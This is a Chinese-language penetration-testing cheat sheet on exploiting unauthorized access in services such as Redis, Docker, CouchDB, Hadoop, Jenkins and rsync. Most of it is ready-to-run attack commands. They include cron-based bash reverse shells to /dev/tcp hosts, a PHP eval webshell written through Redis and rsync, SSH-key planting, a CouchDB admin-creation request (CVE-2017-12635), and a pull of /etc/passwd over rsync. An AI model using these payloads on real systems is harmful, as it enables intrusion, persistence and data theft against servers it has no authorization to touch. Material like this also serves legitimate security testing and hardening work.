总结目前开发和运维架构中,常用的应用未授权访问漏洞利用方式。包含MongoDB、nfs、ZooKeeper、Memcache、Elasticsearch、docker、Hadoop、CouchDB、RedisJenkins、rsync等。
一、MongoDB
MongoDB默认端口27017,当配置成无验证时,存在未授权访问,使用msf中的scanner/mongodb/mongodb_login模块进行测试,使用navicat连接获取数据库中的内容。
use auxiliary/scanner/mongodb/mongodb_login
set rhosts 192.168.90.0/24
set threads 10
exploit
二、nfs
nfs默认端口2049,配置不当时,可以远程挂载nfs的共享目录。
apt install nfs-common 安装nfs客户端
showmount -e 192.168.70.162 查看nfs服务器上的共享目录
mount -t nfs 192.168.70.162:/grdata /mnt 挂载到本地
umount /mnt 卸载目录
三、ZooKeeper
ZooKeeper是一个分布式的,开放源码的应用程序协调服务,默认端口2181,在未进行任何访问控制的情况下,存在未授权访问漏洞。
echo envi|nc 192.168.80.196 2181 列出服务环境有关的信息
echo stat|nc 192.168.80.196 2181 列出关于性能和连接的客户端统计信息
四、Memcache
memcache是一套分布式的高速缓存系统,它以Key-Value(键值对)形式将数据存储在内存中,默认开放11211端口,使用nmap的脚本进行扫描。
nmap 192.168.70.129 -p11211 --script="memcached-info.nse"
使用nc连接获取敏感信息
- stats 查看memcache 服务状态
- stats items 查看所有items
五、Elasticsearch
Elasticsearch是用Java开发的企业级搜索引擎,默认端口9200,存在未授权访问漏洞时,可被非法操作数据。
http://192.168.80.126:9200/_plugin/head/ web管理界面
http://192.168.80.126:9200/_cat/indices 查看集群当前状态
http://192.168.80.126:9200/_nodes 查看节点数据
http://192.168.80.126:9200/_river/_search 查看数据库敏感信息
六、docker
该未授权访问漏洞是因为docker remote api可以执行docker命令,该接口的目的是取代docker命令界面,通过url操作docker。docker swarm是用来管理docker集群的,在开放2375端口监听集群容器时,会调用这个api。
#安装类库
pip install -r requirements.txt
#查看运行的容器
python dockerRemoteApiGetRootShell.py -h 192.168.80.221 -p 2375
#查看所有的容器
python dockerRemoteApiGetRootShell.py -h 192.168.80.221 -p 2375 -a
#查看端口映射
python dockerRemoteApiGetRootShell.py -h 192.168.80.221 -p 2375 -L
#在容器中执行命令
python dockerRemoteApiGetRootShell.py -h 192.168.80.221 -p 2375 -e "whoami" -I 容器id
#查看服务端api版本
python dockerRemoteApiGetRootShell.py -h 192.168.80.221 -p 2375 -V
工具:https://github.com/Tycx2ry/docker_api_vul
七、Hadoop
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,Hadoop YARN ResourceManager WebUI页面如下:
在没有 hadoop client 的情况下,直接通过 REST API也可以提交任务执行。利用过程如下:
- 在本地监听等待反弹 shell 连接
- 调用 New Application API 创建 Application
- 调用 Submit Application API 提交
工具:https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py
八、CouchDB
CouchDB是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库,2017年时被爆出了2个CVE:
- CVE-2017-12635垂直权限绕过 发送如下数据包,可成功创建管理员用户,账户密码均为vulhub,web界面登录地址为:http://192.168.70.45:5984/_utils/
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.70.45:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}
- CVE-2017-12636任意命令执行 Couchdb 2.x和1.x的API接口有一定区别,所以这个漏洞的利用方式也不同。使用以下exp,修改其中的target和command为你的测试机器,然后修改version为对应的Couchdb版本(1或2),可成功反弹shell。
工具:https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py
九、Redis
Redis安装完成后,默认是没有账号密码的,如果配置不当可能造成未授权访问漏洞。主要有以下三种利用方式:
- 写ssh公钥,需要root权限 利用过程:
ssh-keygen -t rsa 生成ssh公钥和私钥
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt 将公钥保存成key.txt
cat /root/.ssh/key.txt | redis-cli -h 192.168.80.44 -x set xxx 写入redis
redis-cli -h 192.168.80.44 连接redis
config set dir /root/.ssh 设置写文件的目录
config set dbfilename authorized_keys 设置写入的文件名
save
使用ssh远程登录:
ssh root@192.168.80.44 -p 22622
- 写定时任务,需要root权限 利用过程:
redis-cli -h 192.168.80.44
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.40.155/4444 0>&1\n\n"
config set dir /var/spool/cron 设置写文件的目录
config set dbfilename root 设置写入的文件名
save
使用nc接收shell:
nc -nvvlp 4444
补充:可利用cron的位置
/etc/crontab
/etc/cron.d/
/var/spool/cron/root为centos系统root用户的cron文件
/var/spool/cron/crontabs/root为debian系统root用户的cron文件
- 写webshell,需要知道web路径 利用过程:
redis-cli -h 192.168.80.44
config set dir /var/www/html
set xxx "\n\n\n<?php@eval($_POST['c']);?>\n\n\n"
config set dbfilename webshell.php
save
4.利用主从复制getshell root用户会收到root的shell,redis用户会收到redis的shell。
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand/
make
git clone https://github.com/Ridter/redis-rce
python redis-rce.py -r 192.168.80.147 -L 192.168.80.166 -f module.so
nc -nvvlp 81 服务器上监听81端口
5.Windows下如何getshell?
- 写入webshell,需要知道web路径
- 写入启动项,需要目标服务器重启
- 写入MOF,MOF每隔5秒钟会自动执行一次,适用于Windows2003。
补充:redis常用命令
info、keys *、set animal 'Cat'、get animal、del animal、config get dir、config get dbfilename
十、Jenkins
默认情况下 Jenkins 面板中可以使用脚本命令行,攻击者通过未授权访问漏洞执行系统命令从而获取服务器的权限。
http://www.example.com:8080/manage
http://www.example.com:8080/script
-
执行系统命令:
println "ls".execute().text
- 反弹shell
十一、rsync
- 查看模块名列表
root@kali:~# nmap 192.168.80.201 -p 873 -n -Pn --script="rsync-list-modules.nse"
root@kali:~# rsync rsync://192.168.80.201:873/
- 查看模块下的文件
root@kali:~# rsync rsync://192.168.80.201:873/src/
- 下载任意文件
root@kali:~# rsync -av rsync://192.168.80.201:873/src/etc/passwd ./
- 通过写文件getshell
- 写入webshell
root@kali:~# rsync -av webshell.php rsync://192.168.80.201:873/src/var/webshell.php
- 写入定时任务 首先查看当前有哪些定时任务:
root@kali:~# rsync -av rsync://192.168.80.201:873/src/etc/crontab ./
root@kali:~# cat crontab
然后创建一个shell文件
root@kali:~# vim shell
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.80.221/4444 0>&1
root@kali:~# chmod +x shell
最后将shell文件写入定时任务(注意每小时的第17分钟会执行)
root@kali:~# rsync -av shell rsync://192.168.80.201:873/src/etc/cron.hourly
参考:
https://paper.seebug.org/409/#0x02-redis
https://xz.aliyun.com/t/2320#toc-42
作者:Instu 链接:https://www.jianshu.com/p/40fbd63cf982